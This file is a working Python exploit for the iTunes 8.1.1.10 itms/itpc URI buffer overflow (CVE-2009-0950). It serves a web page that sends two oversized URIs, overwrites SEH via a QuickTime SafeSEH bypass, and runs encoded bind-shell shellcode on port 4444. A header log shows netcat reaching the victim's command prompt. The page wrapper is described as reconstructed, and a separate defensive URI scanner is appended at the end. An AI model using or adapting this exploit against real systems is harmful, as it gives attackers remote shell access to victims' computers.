#!/usr/bin/python
# Apple iTunes 8.1.1.10 itms/itcp BOF Windows Exploit
# Matteo Memelli | ryujin __A-T__ offensive-security.com
# Spaghetti & Pwnsauce - 06/10/2009 www.offensive-security.com
# CVE-2009-0950 http://dvlabs.tippingpoint.com/advisory/TPTI-09-03
# The vulnerability can't be exploited by simply overwriting a return address on
# the stack because of stack canary protection. Increasing the buffer size leads
# to an SEH overwrite, but it seems that the Access Violation needed to get our
# own Exception Handler called is not always thrown.
# So, to increase reliability, the exploit sends two URIs to iTunes:
# - the 1st payload corrupts the stack (it doesn't overwrite the cookie, no crash)
# - the 2nd payload fully overwrites SEH to 0wN EIP
# Payloads must be encoded in order to obtain pure ASCII printable shellcode.
# I could trigger the vulnerability from Firefox but not from IE, which seems
# to truncate the long URI.
# Tested on Windows XP SP2/SP3 English, Firefox 3.0.10,
# iTunes 8.1.1.10, 8.1.0.52
#
# --> hola hola ziplock, my Apple Guru! ;) && cheers to muts... he knows why
#
# ryujin:Desktop ryujin$ ./ipwn.py
# [+] iTunes 8.1.10 URI Bof Exploit Windows Version CVE-2009-0950
# [+] Matteo Memelli aka ryujin __A-T__ offensive-security.com
# [+] www.offensive-security.com
# [+] Spaghetti & Pwnsauce
# [+] Listening on port 80
# [+] Connection accepted from: 172.16.30.7
# [+] Payload sent, wait 20 secs for iTunes error!
# ryujin:Desktop ryujin$ nc -v 172.16.30.7 4444
# Connection to 172.16.30.7 4444 port [tcp/krb524] succeeded!
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\Mozilla Firefox>
from socket import socket, AF_INET, SOCK_STREAM
# Page served to the browser. The original HTML markup was lost when this file
# was scraped, so the wrapper is reconstructed: the two %s slots receive url1
# (itms://, opens iTunes via openiTunes()) and url2 (itpc://, overwrites SEH)
# in that order; the delay before the second URI is an assumption.
html = """<html><head>
<script type="text/javascript">
function openiTunes() { window.location = "%s"; }
function sendPayload() { window.location = "%s"; }
</script>
</head>
<body onload="openiTunes(); setTimeout('sendPayload()', 5000);">
<pre>
iTunes 8.1.1.10 URI Bof Exploit Windows Version CVE-2009-0950
ryujin __ A-T __ offensive-security.com
www.offensive-security.com
iTunes starting... wait for 20 secs; if you get an error, click "Ok"
in the MessageBox before checking for your shell on port 4444 :)
If victim host is not connected to the internet, exploit will fail
unless iTunes is already opened and you disable "openiTunes" javascript
function.
This exploit works if opened from Firefox not from IE!
After exploitation iTunes crashes, you need to kill it from TaskManager
have fun!
</pre>
</body></html>
"""
# Alpha2 ASCII printable Shellcode 730 Bytes, via EDX (0x60,0x40 Badchar)
# This is not standard Alpha2 bind shell. Beginning of shellcode is modified
# in order to obtain register alignment and to reset ESP and EBP we mangled
# before. Rest of decoded shellcode is Metasploit bind shell on port 4444
# EXITFUNC=thread
#
shellcode = ("VVVVVVVVVVVVVVVVV7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIOqhDahIoS0"
"5QnaJLS1uQVaeQcdcm2ePESuW5susuPEsuilazJKRmixHykOkOKOCPLKPlUtu"
"tnkRegLLKSLfepx31zOlK2o7hlKqOEpWqZK3ylKwDLKeQHndqo0j9llOt9P3D"
"uW9Q8J4MWqkrJKkDukPTWTq845M5LKQOq4VajKcVLKTLPKlKQOUL6ajK336LL"
"KMY0lWTwle1O3TqiK2DLKaSFPLKQPVllK0p7lLmlK3pUXQNU8LNbnvnjL0PkO"
"8V2Fv3U61xds02U8RWpsVRqO649on0PhjkZMYlekpPKOKfsoMYkUpfna8mgxV"
"b65RJuRIoHPPhHYFiL5lmBwkOzvpSPSV3F3bsg3BsSsScIohPsVRHR1sl2Fcc"
"k9M1nuphOT6zppIWrwKO8VcZ6ppQv5KO8PBHmtNMvNm9QGKON6aCqEkOZpbHZ"
"EbiNfRiSgioiFRpf40TseiohPLSu8KWD9kvPyf7YoxVqEKOxPu6sZpd3VSX1s"
"0mK98ecZRpv9Q9ZlMYkWqzpDmYxbTqO0KCoZKNaRVMkN3r6LJ3NmpzFXNKNKL"
"ksX0rkNls5FkOrURdioXVSk67PRPQsapQCZgqbq0QSesaKOxPaxNMZyEUjnCc"
"KOn6qzKOkOtwKOJpNk67YlMSKtcTyozvrryozp0hXoZnYp1p0SkOXVKOHPA")
# Padding
pad0x1 = "\x41"*425
# Make EDX pointing to shellcode and "pray" sh3llcod3 M@cumBa w00t w00t
align = "\x61"*45 + "\x54\x5A" + "\x42"*6 + "V"*10
# Padding
pad0x2 = "\x41"*570
# ASCII friendly RET overwriting SEH: bye bye canary, tweet tweet
# 0x67215e2a QuickTime.qts ADD ESP,8;RETN (SafeSEH bypass)
ret = "\x2a\x5e\x21\x67"
# Let the dance begin... Point EBP to encoded jmp
align_for_jmp = "\x61\x45\x45\x45" + ret + "\x44" + "\x45"*7
# Decode a NEAR JMP and JUMP BACK BABY!
jmp_back = ("UYCCCCCCIIIIIIIIII7QZjAXP0A0AkA"
"AQ2AB2BB0BBABXP8ABuJIZIE5jZKOKOA")
# Padding
pad0x3 = "\x43"*162
# We send 2 payloads to iTunes: first is itms and second itpc
# url1 smashes the stack in order to get an AV later
url1 = "itms://:" + "\x41"*200 + "/"
url2 = "itpc://:" + pad0x1 + align + shellcode + pad0x2 + \
       align_for_jmp + jmp_back + pad0x3
payload = html % (url1, url2)
print "[+] iTunes 8.1.1.10 URI Bof Exploit Windows Version CVE-2009-0950"
print "[+] Matteo Memelli aka ryujin __A-T__ offensive-security.com"
print "[+] www.offensive-security.com"
print "[+] Spaghetti & Pwnsauce"
s = socket(AF_INET, SOCK_STREAM)
s.bind(("0.0.0.0", 80))
s.listen(1)
print "[+] Listening on port 80"
c, addr = s.accept()
print "[+] Connection accepted from: %s" % (addr[0])
c.recv(1024)
c.send(payload)
print "[+] Payload sent, wait 20 secs for iTunes error!"
c.close()
s.close()
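As an added defender-side example (not part of the original exploit), the check below scans text for itms:// and itpc:// URIs whose authority component looks like padding rather than a store host name; the thresholds and the sample inputs are assumptions constructed here.

```python
import re

# Constructed sample inputs (not from the original page): a benign iTunes Store
# link and two URIs shaped like the exploit's url1/url2 (oversized authority
# after "scheme://:").
SAMPLE_URIS = [
    "itms://phobos.apple.com/WebObjects/MZStore.woa/wa/viewAlbum?id=1",
    "itms://:" + "A" * 200 + "/",
    "itpc://:" + "A" * 1500,
]

# iTunes URI handlers exercised by the page: itms:// and itpc://.
ITUNES_URI_RE = re.compile(r"\b(itms|itpc)://([^/\s\"'<>]*)", re.IGNORECASE)

MAX_AUTHORITY = 128     # assumed threshold; legitimate store hosts are far shorter
MAX_RUN = 32            # assumed: longest run of one repeated byte tolerated

def longest_run(s):
    """Length of the longest run of a single repeated character in s."""
    best = cur = 0
    prev = None
    for ch in s:
        cur = cur + 1 if ch == prev else 1
        prev = ch
        best = max(best, cur)
    return best

def inspect_uri(text):
    """Return (scheme, authority_length, reasons) for each itms:// or itpc://
    URI in text whose authority looks like padding rather than a host name.
    An empty list means nothing suspicious was found."""
    findings = []
    for m in ITUNES_URI_RE.finditer(text):
        scheme, authority = m.group(1).lower(), m.group(2)
        reasons = []
        if len(authority) > MAX_AUTHORITY:
            reasons.append("authority longer than %d bytes" % MAX_AUTHORITY)
        if longest_run(authority) > MAX_RUN:
            reasons.append("long run of one repeated byte")
        if authority.startswith(":"):
            reasons.append("empty host before port separator")
        if reasons:
            findings.append((scheme, len(authority), reasons))
    return findings

def scan(lines):
    """Apply inspect_uri to every line; returns (line_no, finding) tuples."""
    return [(i, f) for i, line in enumerate(lines, 1) for f in inspect_uri(line)]

if __name__ == "__main__":
    for line_no, (scheme, length, reasons) in scan(SAMPLE_URIS):
        print("line %d: %s:// authority %d bytes: %s" % (line_no, scheme, length, "; ".join(reasons)))
```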